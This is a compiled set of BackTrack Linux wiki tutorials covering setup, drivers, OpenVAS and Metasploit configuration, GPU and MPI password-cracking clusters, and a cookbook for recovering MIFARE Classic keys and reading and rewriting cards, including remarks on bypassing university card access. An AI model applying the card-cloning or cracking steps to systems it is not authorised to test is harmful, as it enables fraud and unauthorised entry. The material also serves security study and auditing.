Once the installation of BackTrack is done, the default username and password required to log in are root / toor. NOTE: You will not be able to see the password as you type it.
X won't start!
On rare occasions (such as after a VMware Tools install, or when using unsupported video cards), X will refuse to start. If that happens, there are several options you can try in order to fix the issue:
Reconfigure the X server package. This resets (and often fixes) the Xorg configuration:
root@bt:~# dpkg-reconfigure xserver-xorg
If you are using Backtrack 5 on x64 with KDE you should try the following:
root@bt:~# rm /root/.kde/cache-*
NOTE: Sometimes you may need to also remove the cache folders in /var/tmp by issuing the following command:
root@bt:~# rm -rf /var/tmp/kdecache-*
DNS server
192.168.1.1
Edit the file as appropriate, then have the network come up automatically at boot time:
root@bt:~# update-rc.d networking defaults
root@bt:~# /etc/init.d/networking restart
All rights reserved. For info, please visit http://www.isc.org/sw/dhcp/
Listening on LPF/eth0/00:0c:29:81:74:21
Sending on LPF/eth0/00:0c:29:81:74:21
Sending on Socket/fallback
DHCPREQUEST of 192.168.1.112 on eth0 to 255.255.255.255 port 67
DHCPACK of 192.168.1.112 from 192.168.1.1
bound to 192.168.1.112 -- renewal in 37595 seconds.
root@bt:~#
In order to get rid of this error you have to reboot BackTrack, then BEFORE starting WICD open up a terminal and type in the following:
root@bt:~# dpkg-reconfigure wicd
root@bt:~# update-rc.d wicd defaults
Starting services
BackTrack has various services such as Apache, SSH, MySQL, VNC, etc. They are all disabled by default. To start a service such as SSH, you can use the service init scripts. For example, to start the SSH service:
root@bt:~# sshd-generate    # Specific to the SSH service - needed to generate SSH keys
root@bt:~# /etc/init.d/ssh start
Starting OpenBSD Secure Shell server: sshd.
root@bt:~# /etc/init.d/ssh stop
Stopping OpenBSD Secure Shell server: sshd.
root@bt:~#
When using a ssh server for the first time on Backtrack you will need to generate keys:
root@bt:~# sshd-generate
To enable a service at boot time, you can use the update-rc.d command, for example, having SSH start at boot time:
root@bt:~# update-rc.d -f ssh defaults
 Adding system startup for /etc/init.d/ssh ...
   /etc/rc0.d/K20ssh -> ../init.d/ssh
   /etc/rc1.d/K20ssh -> ../init.d/ssh
   /etc/rc6.d/K20ssh -> ../init.d/ssh
   /etc/rc2.d/S20ssh -> ../init.d/ssh
   /etc/rc3.d/S20ssh -> ../init.d/ssh
   /etc/rc4.d/S20ssh -> ../init.d/ssh
   /etc/rc5.d/S20ssh -> ../init.d/ssh
root@bt:~#
dpkg -s <package>
    Shows information on the installed package <package>. See also apt-cache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file.
dpkg-reconfigure <package>
    Reconfigures an installed package.
man dpkg
    Will give you more info on these commands as well as many that are in less common usage.
Another very good resource on Linux command usage can be found at linuxcommand.org. Some programs do not have a man page, but you can usually get more information on their usage by typing:
root@bt:~# <program name>
Just the program name without any arguments.
or
root@bt:~# <program name> -help
or
root@bt:~# <program name> --help
or
root@bt:~# <program name> -h
Some programs use other methods, but they are usually just a variation of one of the above five commands.
Occasionally you might want to compile code that requires kernel headers (such as compat-wireless, or other drivers). These are quick instructions on how to do so.
root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/
NOTE: You need to be connected to the internet in order to download the linux-source package.
In this tutorial we will proceed to enable PAE on BackTrack 5 R2. We first prepare our kernel sources and enter the kernel menuconfig.
root@bt:~# prepare-kernel-sources
root@bt:/usr/src/linux# zcat /proc/config.gz > .config
root@bt:/usr/src/linux# make menuconfig
After we have launched the ncurses menuconfig we proceed in enabling PAE which can be found at the following: Processor type and features -> High Memory Support(4) -> 64GB
Once we have enabled PAE from the menuconfig we proceed into building our kernel.
make scripts
make prepare
make
update-initramfs -u
NOTE: Changing additional options in the ncurses config without knowing what the options do might break your kernel!
root@bt:~# apt-get dist-upgrade
root@bt:~# prepare-kernel-sources
root@bt:/usr/src/linux# zcat /proc/config.gz > .config
root@bt:/usr/src/linux# make menuconfig
Configure your kernel to use b43 instead of the default brcmsmac drivers by selecting the BCMA support option. To get to this option, navigate to :
Add the BCMA support as a module, and "Support for BCMA on PCI-host bus" as shown below
Exit the ncurses menu config, and build your kernel package:
make prepare
make
make modules_install
make install
update-initramfs -u
update-grub2
Install Java
This article was contributed by g0tmi1k.
Twitter: https://twitter.com/#!/g0tmi1k
Downloading Java.
root@bt:~# mkdir -p /opt/java && cd /opt/java
root@bt:~# chmod +x /tmp/java.bin && /tmp/java.bin
Final changes.
root@bt:~# update-alternatives --install /usr/bin/java java /opt/java/jre1.6.?_??/bin/java 1
root@bt:~# update-alternatives --set java /opt/java/jre1.6.?_??/bin/java
root@bt:~# mkdir -p /usr/lib/mozilla/plugins/
root@bt:~# ln -sf /opt/java/jre1.6.?_??/lib/i386/libnpjp2.so /usr/lib/mozilla/plugins/
root@bt:~# export JAVA_HOME=/opt/java/jre1.6.?_??/bin/java
First we need to install the flux-for-back package which will grab everything we need in order to get FluxBox running.
root@bt:~# apt-get install flux-for-back
After the package is installed we will see that it automatically starts to set up FluxBox.
Once the script is finished you will be presented with a message which tells you to start FluxBox.
However, before we restart there is one thing that we have to do: we have to tell BackTrack to run FluxBox on the startx command instead of its default WM.
NOTE: In order to revert to the default WM all you have to do is delete the .xinitrc file.
root@bt:~# rm -rf ~/.xinitrc
root@bt:~# shutdown -r 0
As you may have noticed, Flash Player does not work on BackTrack 5, so in order to fix this we first need to remove the current Flash player by issuing the following commands:
root@bt:~# apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common mozilla-plugin-gnash swfdec-mozilla
root@bt:~# rm -f /usr/lib/firefox/plugins/*flash*
root@bt:~# rm -f /usr/lib/firefox-addons/plugins/*flash*
root@bt:~# rm -f /usr/lib/mozilla/plugins/*flash*
root@bt:~# rm -f ~/.mozilla/plugins/*flash*so
root@bt:~# rm -rfd /usr/lib/nspluginwrapper
After removing Flash we need to get the new Flash player from the official website: 1. Flash x64 (ONLY FOR x64). 2. Flash Player (download the .tar.gz file).
We will begin with Flash Square. SKIP THIS if you aren't using an x64 version of BackTrack.
root@bt:~# tar xvfz flashplayer10_2_p3_64bit_linux_111710.tar.gz
root@bt:~# chown root:root libflashplayer.so
root@bt:~# chmod 644 libflashplayer.so
root@bt:~# cp -f libflashplayer.so /usr/lib/mozilla/plugins/
root@bt:~# rm -rf libflashplayer.so
root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox/plugins/
root@bt:~# tar xvfz install_flash_player_10_linux.tar.gz
root@bt:~# mkdir ~/.mozilla/plugins
root@bt:~# mv -f libflashplayer.so ~/.mozilla/plugins/
root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox-addons/plugins/
root@bt:~# ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/xulrunner-addons/plugins/
Twitter: https://twitter.com/#!/g0tmi1k
NOTE: You might need to make some minor tweaks depending on your system. Let's begin:
First of all before we start we want to make sure that our system is up to date.
Before we go on with installing the ATI drivers we need to get our kernel source prepared.
Now that we are set up it's time to download the ATI drivers.
root@bt:~# wget http://www2.ati.com/drivers/linux/ati-driver-installer-11-9-x86.x86_64.run
root@bt:~# chmod +x ati-driver-installer-11-9-x86.x86_64.run
root@bt:~# ./ati-driver-installer-11-9-x86.x86_64.run
root@bt:~# reboot
Before we are finished there is one more thing that we need to install: the AMD Accelerated Parallel Processing (APP) SDK. This one needs to be installed according to your CPU architecture.
We will also need cmake and cmake++ along with some other library files.
Before we can install cmake++ we need to set the ATI Stream paths:
root@bt:~# echo "ATISTREAMSDKROOT=/opt/AMDAPP" >> ~/.bashrc
root@bt:~# echo "export ATISTREAMSDKROOT" >> ~/.bashrc
root@bt:~# source ~/.bashrc
root@bt:~# svn checkout http://pyrit.googlecode.com/svn/trunk/ /tmp/pyrit
root@bt:~# cd /tmp/pyrit/pyrit && python setup.py build && python setup.py install
root@bt:~# cd /tmp/pyrit/cpyrit_opencl && python setup.py build && python setup.py install
Let's quickly configure autoscan in Backtrack5, you can find it using the menu in:
BackTrack -> Information Gathering -> Network Analysis -> Network Scanners -> autoscan
As soon as we launch it from the menu we will begin our configuration wizard, click on Forward to move on:
Now we are going to configure a new Network and add our own data by clicking the Add button:
Here is some output similar to what you will see on some devices:
Unicornscan is an awesome "payload sender" which can also act as an asynchronous scanner. Thanks to dash1b and his awesome patch-up script, we were able to quickly implement the full features of the scanner in BackTrack 5. To install unicornscan on BackTrack 5 (if not already installed), type:
root@bt:~# apt-get update
root@bt:~# apt-get install unicornscan
Next, run the postgres-setup script, which was taken mostly from http://code.google.com/p/unicornscan-bt5-install-script/. This script will set up the Framework3 PostgreSQL server as the DB back-end for Unicornscan.
Start apache, and browse to http://127.0.0.1/unicornscan. Initiate a scan using the epgsqldb option.
Installing OpenVAS
The simplest way of installing all of the required parts of the OpenVAS suite is to issue the following commands in a terminal window.
root@bt:~# apt-get update
root@bt:~# apt-get install openvas
The package openvas is a "master" package that holds all of the info required to automatically download all of the other packages that make up the full openvas suite of tools.
Setting up OpenVAS
Step 1. Adding a user
From the menu, select Openvas Adduser and follow instructions.
Note that you can use any username you like, but in this case I have just used root. I have left it at the default of password authentication, as I am going to be using this on a local machine and want to save having to worry about users needing certs, but this is entirely up to you. You cannot have an empty password, so I have used toor in this case. For the rules applied to this user I have left them blank by pressing ctrl-d. This means that this user will be able to perform any tasks without any restrictions.
At this point we need to get the latest set of NVTs. These are what the scanner uses to detect the vulnerabilities in what you are scanning. Please note you will need to do this quite regularly, and the first time you do it could take a while depending on the speed of your computer and internet connection. So select OpenVAS NVT Sync from the menu.
Note the time in the corner! This was in a VM, so it should be much quicker for you. Subsequent starts will be quick unless you have not updated in quite some time. Please remember that the scanner runs as a daemon in the background and will keep running until you reboot or stop it with the menu entry provided.
Now we need to rebuild the database, as it is now out of date with the added NVTs and we would otherwise get errors about the database. You should do this each time you update the NVTs. This is done with a simple command:
openvasmd --rebuild
This process will only take a few seconds if using openvas-libraries version 4.0.3 or below. This process can take much longer if using openvas-libraries version 4.0.5 or above. The tradeoff for this extra time is much greater scanning capabilities, so it is worth it.
openvasadmin is the username I have chosen to become this user, you however can substitute that with something better suited to you if you so choose. Make sure you can remember this username and associated password as you WILL need it when running openvas.
root@bt:~# openvasad -c 'add_user' -n openvasadmin -r Admin
Enter password:
ad   main:MESSAGE:5871:2011-05-26 04h57.08 BST: No rules file provided, the new user will have no restrictions.
ad   main:MESSAGE:5871:2011-05-26 04h57.08 BST: User openvasadmin has been successfully created.
root@bt:~#
More info on the above commands and other options can be found by running their associated menu entry and by looking at the man pages. As all three of these run as a daemon and will continue running until you shut down your computer, I have provided menu entries so that you can stop them when you no longer need them.
At this point your installation is essentially complete, but as we have got this far we may as well continue to make sure everything is working as expected.
Once logged in you can use this as your scanning interface, or use the next choice if you prefer.
Web interface
This next method is via a web interface. Open your favorite browser and enter the following address: 127.0.0.1:9392. You will then be presented with a login page. Log in with the credentials we created earlier.
Once you have logged in, you will notice that your CPU usage will hit the roof, don't worry, this will return to normal in short while.
Here you can perform and setup all of your scanning tasks. It is a good idea to set NoScript to Temporarily allow 127.0.0.1 or you may get unexpected results. There is much more to OpenVAS than I have included here, but this is only intended to get you up and running quickly. Scans and more advanced setups are beyond the scope of this simple tutorial. Don't forget about some of the other parts to openvas contained within the menu that I have not covered here and also the man pages.
Then from the menu start Greenbone Security Desktop and log in. You are now ready to set up your scanning tasks.
Metasploit Framework with MySQL Support
With a recent bugfix, we have simplified the steps required to use MySQL as a back-end to the Metasploit Framework.
root@bt:~# apt-get update
root@bt:~# apt-get dist-upgrade
root@bt:~# service mysql start
root@bt:~# msfconsole
msf >
Go ahead and connect to the database using the default MySQL root password toor:
msf > db_driver mysql
[*] Using database driver mysql
msf > db_connect root:toor@127.0.0.1/msf3
msf >
BackTrack 5 r2
BackTrack 5 R2 contains patched stock kernel 3.2.6 wireless drivers with several injection patches applied.
b43
BackTrack 5 R2 has switched from b43 drivers to brcmsmac drivers. If you need to enable the b43 drivers, follow this howto - http://www.backtracklinux.org/wiki/index.php?title=Enable_b43_drivers_in_Backtrack5_r2.
BackTrack 5 r1
BackTrack 5 R1 contains patched stock kernel 2.6.39.4 wireless drivers with several injection patches applied. Depending on card and setup, these drivers might not suit you.
rt2800usb
In some cases we've seen cards using the rt2800usb drivers (such as the AWUS036NH and AWUS036NEH ALFAs) act strangely with the BT5R1 kernel. If this happens to you, you can try installing a recent compat-wireless and building it on your own. This specific version will work:
root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build
root@bt:~# cd /usr/src/
root@bt:~# wget http://linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2011-07-14.tar.bz2
root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2
root@bt:~# wget http://www.backtrack-linux.org/2.6.39.patches.tar
root@bt:~# tar xpf 2.6.39.patches.tar
root@bt:~# cd compat-wireless-2011-07-14
root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retrycount.patch
root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch
root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch
root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch
root@bt:~# make
root@bt:~# make install
root@bt:~# reboot
BackTrack 5
BackTrack 5 contains patched stock kernel 2.6.38 wireless drivers, as well as several "external" drivers. Some of these drivers overlap, to provide maximum flexibility with various wireless attacks. The /etc/modprobe.d/blacklist file dictates which preferred drivers are loaded at boot time. Generally speaking, all the older IEEE drivers are blacklisted and need to be loaded manually if you want to use them.
Wireless Drivers
rtl8187 vs r8187
This is a confusing one. The rtl8187 is the mac80211 stack driver, while the r8187 is the old IEEE driver. Both support injection. The newer mac80211 rtl8187 drivers seem to have a nasty bug in VMWare. For more information about these drivers check our rtl8187 vs r8187 page.
compat wireless
As Linux wireless drivers mature, more chipsets get added to the compatibility list. If none of the native BackTrack kernel drivers work for you, you might want to consider using a more recent version of compat-wireless. Check out the compat-wireless page for information on how to get those drivers up and running.
Wireless Cards
THIS LIST NEEDS TO BE UPDATED FOR BT5.
AWUS036H (rtl8187, r8187) - both mac80211 and IEEE drivers - passed
AWUS036NH (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed
BCM4312 802.11b/g LP-PHY (rev 01) - using the mac80211 b43, works well - passed
Rockland N3 (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed
Edimax EW-7318USG USB (Ralink RT2501/RT2573) - using the mac80211 rt2500usb/rt73usb drivers - passed
ASUSTek Computer, Inc. RT2573 - using the mac80211 rt2500usb/rt73usb drivers - passed
Linksys WUSB54GC ver 3 - using the mac80211 rt2800usb drivers - passed
Ubiquiti SRC - using the mac80211 ath9k drivers - passed
Internal Intel Corporation PRO/Wireless 3945ABG - using the mac80211 iwl3945 drivers - passed
Dlink WNA-2330 PCMCIA - using the mac80211 ath5k drivers - passed
Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) - using the mac80211 ath9k drivers - passed
Netgear wg111v2 - using the mac80211 rtl8187 drivers - passed
ZyXEL AG-225H v2 - using the mac80211 zd1211 drivers - passed
Intel 4956/5xxx - using the iwlagn drivers - passed
Broadcom Corporation BCM4321 802.11a/b/g/n (rev 03)
Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller (rev 01)
D-Link DWL-122 - using the mac80211 prism2_usb drivers - fail
Linksys WUSB600N v2 - using the mac80211 rt2800usb drivers - fail
AWUS051NH - fail
For informational use only as part of academic or research study, especially in the field of informational security, cryptography and secure systems
As-is, without any warranty, support or liability. Any damages or consequences obtained as a result of consulting this information are purely on the side of the reader. NOT to be used in illegal circumstances (for example to abuse, hack or trick a system which the reader does not have specific authorization for, such as ticketing systems, public transport, University/ISIC cards, building access systems or whatever systems use Mifare Classic as core technology).
NOTES:
This article contains no original research. All the research and implementation was made by other people and communities and is publicly available. We made this two cents just for fun and because we love BackTrack. This is not an A-Z guide, so try harder!
0x00 - Preface
Some of you may have read that the proprietary symmetric key cryptographic algorithm of the MIFARE Classic card has been broken. The MIFARE Classic card is used in physical access control systems (PACS) and contactless payment systems (including tollway and public transportation systems). By some estimates, there are 500 million MIFARE cards deployed worldwide, and the majority of them are MIFARE Classic cards.
Mifare Classic is an inexpensive, entry-level chip, based on ISO/IEC 14443 Type A, with 1kB or 4kB of memory. It uses the 13.56 MHz contactless smartcard standard and the proprietary CRYPTO1 cipher with 48-bit keys. There is no protection against cloning or modification. Anyone with a 50 reader can use this weakness against your infrastructure. At least one sector is always encrypted with a default key. After cracking all keys, attackers are able to change the name, the student's university number, the expiration date... This cookbook is a proof of concept of how easily that can be done. Chosen ingredients: BackTrack | Touchatag starter package. Tested on: BackTrack 4 R2, BackTrack 5 Final (32bit).
Dependencies
0x01 - Hardware
Touchatag - ACR122U
Touchatag is an ACS ACR122(U) NFC reader, a USB RFID reader. The USB reader works at 13.56 MHz (High Frequency RFID) and has a readout distance of about 4 cm (1 inch) when used with the Touchatag RFID tags. This product is made by Advanced Card Systems Limited and seems to be available in different layouts, but the hardware doesn't differ much. They are all using a PN532 NFC controller chip and an ST7 microcontroller unit.
0x02 - Software
ACR122U driver
root@bt:~# wget http://www.acs.com.hk/drivers/eng/ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip
root@bt:~# unzip -d acr122u ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip
root@bt:~# cd acr122u
root@bt:~# tar -jxvf acsccid-1.0.2.tar.bz2
root@bt:~# cd acsccid-1.0.2
root@bt:~# ./configure
root@bt:~# make
root@bt:~# checkinstall -D -y --install
If your reader is rejected because of the firmware (log message: Firmware (x.y) is bogus!), just disable version checking. All you need to do is change ifdDriverOptions (line 55 in Info.plist) to skip version checking, like this:
root@bt:~# nano /usr/lib/pcsc/drivers/ifd-ccid.bundle/Contents/Info.plist
ifdDriverOptions
00005
Afterwards, restart the pcscd daemon and your Touchatag reader should be recognized and ready.
You can also use the -k key parameter to add a key to the list of known keys, which is tried against your card in the initial phase. The -k option somehow didn't work for me, so I always compile my known keys directly into mfoc.c: search for the array with the default Mifare Classic keys. Not sure about other countries, but in the country where I live the keys are the same. Once you have the keys from all sectors, you should be able to use RFID-Fu against other cards, which is an epic fail.
root@bt:~# nfc-mfclassic --help
Usage: nfc-mfclassic r|w a|b <dump.mfd> [<keys.mfd>]
  r|w           - Perform read from (r) or write to (w) card
  a|b           - Use A or B keys for action
  <dump.mfd>    - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
  <keys.mfd>    - MiFare Dump (MFD) that contain the keys (optional)
Or: nfc-mfclassic x <dump.mfd> <payload.bin>
  x             - Extract payload (data blocks) from MFD
  <dump.mfd>    - MiFare Dump (MFD) that contains wanted payload
  <payload.bin> - Binary file where payload will be extracted
Keep in mind that the card UID will not be affected (not changed) by this process. Buy some blank cards or a Proxmark III if that is what you want. If you are now thinking about dumping your electronic wallet right after recharging it and, when the credit comes to zero, writing the content back, then please don't do it. What can stop you from doing that? Well, probably only your conscience, but if the card gets blocked within 24 hours after first use then don't complain. Yes, there are online checking and billing systems out there for basic cards.
At some universities, the only entry security check is the ISIC card. As you can see, this is trivial to bypass. We did many tests with public transportation systems and with university systems. The results are all the same: those systems are easily hackable.
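To make the two weaknesses above concrete from the defender's side (the UID and its BCC checksum live in block 0, and every sector trailer carries key A, the access bits and key B, so a dump can be audited for sectors still on a default key), here is an added example that is not part of the original cookbook. It parses a 1K dump in the layout nfc-mfclassic writes (assumed: 16 sectors of 4 blocks of 16 bytes, the trailer being the last block of each sector, with the keys used for reading filled into the trailer) and reports the UID, whether the BCC is consistent, and which sectors still use a well-known default key. The dump it runs on is constructed inline, not read from a real card.

```python
"""Audit a MIFARE Classic 1K dump (.mfd) for default keys and a consistent UID/BCC."""
from dataclasses import dataclass
from typing import List

BLOCK_SIZE = 16
BLOCKS_PER_SECTOR = 4
SECTORS_1K = 16
DUMP_SIZE_1K = BLOCK_SIZE * BLOCKS_PER_SECTOR * SECTORS_1K  # 1024 bytes

# Publicly documented default keys: NXP factory key, MAD key A, NDEF public key.
DEFAULT_KEYS = {
    bytes.fromhex("ffffffffffff"),
    bytes.fromhex("a0a1a2a3a4a5"),
    bytes.fromhex("d3f7d3f7d3f7"),
}


@dataclass
class SectorTrailer:
    sector: int
    key_a: bytes
    access_bits: bytes  # 3 access bytes + 1 general-purpose byte
    key_b: bytes


def block(dump: bytes, sector: int, index: int) -> bytes:
    """Return one 16-byte block of the dump."""
    start = (sector * BLOCKS_PER_SECTOR + index) * BLOCK_SIZE
    return dump[start:start + BLOCK_SIZE]


def parse_uid(dump: bytes):
    """Return the 4-byte UID (hex) from block 0 and whether its BCC (XOR of UID bytes) matches."""
    b0 = block(dump, 0, 0)
    uid, bcc = b0[:4], b0[4]
    expected = uid[0] ^ uid[1] ^ uid[2] ^ uid[3]
    return uid.hex(), bcc == expected


def sector_trailers(dump: bytes) -> List[SectorTrailer]:
    """Split every sector trailer into key A / access bits / key B."""
    trailers = []
    for s in range(SECTORS_1K):
        t = block(dump, s, BLOCKS_PER_SECTOR - 1)
        trailers.append(SectorTrailer(s, t[:6], t[6:10], t[10:16]))
    return trailers


def audit_dump(dump: bytes) -> dict:
    """Summarise the dump: UID, BCC consistency, and sectors still on a default key."""
    if len(dump) != DUMP_SIZE_1K:
        raise ValueError(f"expected a {DUMP_SIZE_1K}-byte 1K dump, got {len(dump)}")
    uid, bcc_ok = parse_uid(dump)
    weak = [t.sector for t in sector_trailers(dump)
            if t.key_a in DEFAULT_KEYS or t.key_b in DEFAULT_KEYS]
    return {"uid": uid, "bcc_ok": bcc_ok, "default_key_sectors": weak}


def build_sample_dump() -> bytes:
    """Constructed sample: UID 01020304, sector 0 on the factory key A, sector 5 on the factory key B."""
    dump = bytearray(DUMP_SIZE_1K)
    uid = bytes.fromhex("01020304")
    dump[0:4] = uid
    dump[4] = uid[0] ^ uid[1] ^ uid[2] ^ uid[3]   # BCC
    dump[5] = 0x08                                # SAK of a Classic 1K
    dump[6:8] = bytes.fromhex("0400")             # ATQA
    for s in range(SECTORS_1K):
        start = (s * BLOCKS_PER_SECTOR + 3) * BLOCK_SIZE
        dump[start:start + 6] = bytes([0x10 + s]) * 6          # per-sector key A (constructed)
        dump[start + 6:start + 10] = bytes.fromhex("ff078069")  # transport access bits
        dump[start + 10:start + 16] = bytes([0x20 + s]) * 6    # per-sector key B (constructed)
    s0 = 3 * BLOCK_SIZE
    dump[s0:s0 + 6] = bytes.fromhex("ffffffffffff")
    s5 = (5 * BLOCKS_PER_SECTOR + 3) * BLOCK_SIZE
    dump[s5 + 10:s5 + 16] = bytes.fromhex("ffffffffffff")
    return bytes(dump)


if __name__ == "__main__":
    print(audit_dump(build_sample_dump()))
```

Running it on a dump of a production card tells you at a glance how many sectors an attacker with the published default-key list would open without any CRYPTO1 recovery at all; a deployment that wants to survive the attacks in this cookbook should show an empty list here and, as the conclusion says, not rely on the chip's cipher alone.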
0x06 Conclusion
Finally, when will people learn their lesson? Cryptographic algorithms should be public so that they can be scrutinized and tested. Secret algorithms aren't more valuable because they are secret. Anyone needing a highly secure smart card should make sure there is layered security and not just depend on the chip's encryption.
Since I have access to a Proxmark III, which is a universal RFID hacking tool that can be used for 100% accurate cloning (even the UID), I may once write a second edition about c00king with Mifare Classic and HID Prox... Arming BackTrack with a GSM attack suite?
0x08 Thanks
This cookbook was made with great help from h4f guys, many thanks to Vulcano and Back.
0x0A - About
MI1 is a "full time security enthusiast" with university degree in the field of informatics. Recently focusing his passion to USRP and RFID stuff.
This guide is a work in progress, and is meant to help those needing to get CUDA working on their BackTrack machines. Start by preparing your kernel sources for the Nvidia driver installation:
root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/
Make sure you are not in an X session (log out to console), and run the Nvidia driver installer. Next, download the CUDA toolkit, according to your CPU architecture:
Ideally you should install the CUDA toolkit to /opt; this guide assumes this installation path. Configure your environment variables so that the nvcc command works. You can do this by appending the following lines to your /root/.bashrc file:
Then run:
root@bt:~# source /root/.bashrc
root@bt:~# ldconfig
The whole purpose of this was to get the nvcc compiler installed. You can check that everything is set up correctly:
root@bt:~# which nvcc
/opt/cuda/bin/nvcc
root@bt:~# nvcc -V
nvcc: NVIDIA (R) Cuda compiler driver
Copyright (c) 2005-2011 NVIDIA Corporation
Built on Sun_Mar_20_16:45:27_PDT_2011
Cuda compilation tools, release 4.0, V0.2.1221
root@bt:~#
Now that the Nvidia driver and CUDA toolkit are installed, we can test their functionality with a GPU powered tool such as pyrit.
root@bt:~# svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit
root@bt:~# cd pyrit/pyrit && python setup.py build && python setup.py install
root@bt:~# cd ../../
root@bt:~# cd pyrit/cpyrit_cuda && python setup.py build && python setup.py install
'CUDA-Device #1 'GeForce GTX 295'': 11558.7
'CUDA-Device #2 'GeForce GTX 295'': 10912.5
'CUDA-Device #3 'GeForce GTX 295'': 10632.1
'CUDA-Device #4 'GeForce GTX 295'': 11654.7
'CUDA-Device #5 'GeForce GTX 295'': 10868.9
'CUDA-Device #6 'GeForce GTX 295'': 10322.8
'CPU-Core (SSE2)': 500.7 PMKs/s (RTT 2.7)
'CPU-Core (SSE2)': 508.9 PMKs/s (RTT 2.8)
Success! We can now use CUDA powered tools from within BackTrack.
In this tutorial we are going to build a cluster that will aid us in cracking hashes using John the Ripper. The first thing we want to do is install libssl-dev and mpich2, after which we configure it. (Note: secretword must be the same on each machine.)
root@bt:~# apt-get install mpich2 libssl-dev
root@bt:~# touch /etc/mpd.conf
root@bt:~# chmod 600 /etc/mpd.conf
root@bt:~# echo "secretword=bt" >> /etc/mpd.conf
root@bt:~# touch mpd.hosts
root@bt:~# echo "192.168.1.69:1" >> mpd.hosts
root@bt:~# chmod 600 mpd.hosts
root@bt:~# mpdboot
root@bt:~# mpdtrace
bt
root@bt:~# mpdallexit
root@bt:~/Desktop# wget http://www.bindshell.net/tools/johntheripper/john-1.7.3.1-all-2-mpi8.tar.gz
root@bt:~/Desktop# tar xvfz john-1.7.3.1-all-2-mpi8.tar.gz
root@bt:~/Desktop/john-1.7.3.1-all-2-mpi8/src# make clean linux-x86-sse2
root@bt:~# mv -f john-1.7.3.1-all-2-mpi8 /pentest/passwords/john-mpi
After installing the MPI version of John the Ripper we configure our /etc/hosts file.
192.168.1.70   node1
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
Once we have the server and the client set up, it's time to enable our SSH server and transfer the configuration files from the server to the client.
root@bt:~# ssh root@192.168.1.70 mkdir -p /root/.ssh
root@bt:~# cat /root/.ssh/id_rsa.pub | ssh root@192.168.1.70 'cat >> .ssh/authorized_keys'
root@bt:~# scp /root/mpd.hosts root@192.168.1.70:/root/
root@bt:~# scp /etc/mpd.conf root@192.168.1.70:/etc/
root@bt:~# scp /etc/hosts root@192.168.1.70:/etc/
root@bt:~# mpdboot -v --file=/root/mpd.hosts -n 2
running mpdallexit on bt
LAUNCHED mpd on bt via
RUNNING: mpd on bt
LAUNCHED mpd on 192.168.1.70 via bt2
RUNNING: mpd on 192.168.1.70
root@bt:~# echo "admin:21232f297a57a5a743894a0e4a801fc3" > /root/test
root@bt:~# scp /root/test root@192.168.1.70:/root/
root@bt:~# mpiexec -host 192.168.1.69 -np 2 /pentest/passwords/john-mpi/run/john --format:raw-MD5 /root/test
Loaded 1 password hash (Raw MD5 [raw-md5])
admin            (admin)
admin            (admin)
thread: 1 guesses: 1 time: 0:00:00:00 100% (1) admins
thread: 0 guesses: 1 time: 0:00:00:00 100% (1) admins
In this tutorial we are going to build a cluster on BackTrack 5 R2 using Pyrit. Pyrit comes installed by default on BackTrack 5 R2. If you have removed it, simply use apt-get install to install it. The first step to creating a Pyrit cluster is to create a configuration file.
default_storage = file://
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients = 192.168.1.69    (This is the server's IP)
rpc_server = true
workunit_size = 75000
After having the above configuration file on all our machines, we start the server.
Now from the client you should be able to see both cores.
NOTE: The pyrit list_cores command has a bug that when used will crash the server.
We can test our newly built cluster using pyrit's benchmark option.
If we switch to the server while running the benchmark, we can see that currently one client is connected.
soft phones). Nowadays there are many vendors of PBXs, IP telephones, VoIP services and equipment, such as CISCO, AVAYA, ASTERISK, SNOM and THOMSON. With new technology comes a new challenge for both the defensive and offensive side of security. One of the great dangers of traditional phone lines was that they were susceptible to eavesdropping. The old-school way to eavesdrop on somebody's phone line was to physically connect a small transmitter somewhere along the phone cord, inside or outside their premises.
IP telephony systems are also susceptible to eavesdropping, but doing so in an IP environment is a little more difficult to execute and detect, and requires more knowledge and the right set of tools. In this article we won't discuss a particular vendor or technique, but we will take a look at the concepts and the tools available for attacking VoIP that BackTrack Linux gives us. The main goal of this article is to present the tools and their purpose in order to help you choose the right tool for the right situation. We will examine some real-world attack vectors and discover how BackTrack can assist us in pentesting VoIP; we will also examine some of the tools present in BackTrack and their usage.
Self Hosted
A PBX (e.g. Asterisk) is installed at the client site and connected to an ISP or telephony service provider's PSTN via a SIP trunk/PRI; the VoIP traffic flows through a dedicated VLAN.
Hosted Services
There is no need for a PBX on site. Just a switch, a router, IP phones and a connection to the service provider's PBX via the internet or an IP/VPN connection; each phone is configured with SIP account information.
SIP Basics
The role of SIP (Session Initiation Protocol) is to set up, terminate or modify a voice or video call, where the voice and/or video traffic is carried by a protocol like RTP (Real-time Transport Protocol). SIP is an application layer protocol which uses UDP for transport (TCP and SCTP can be used as well).
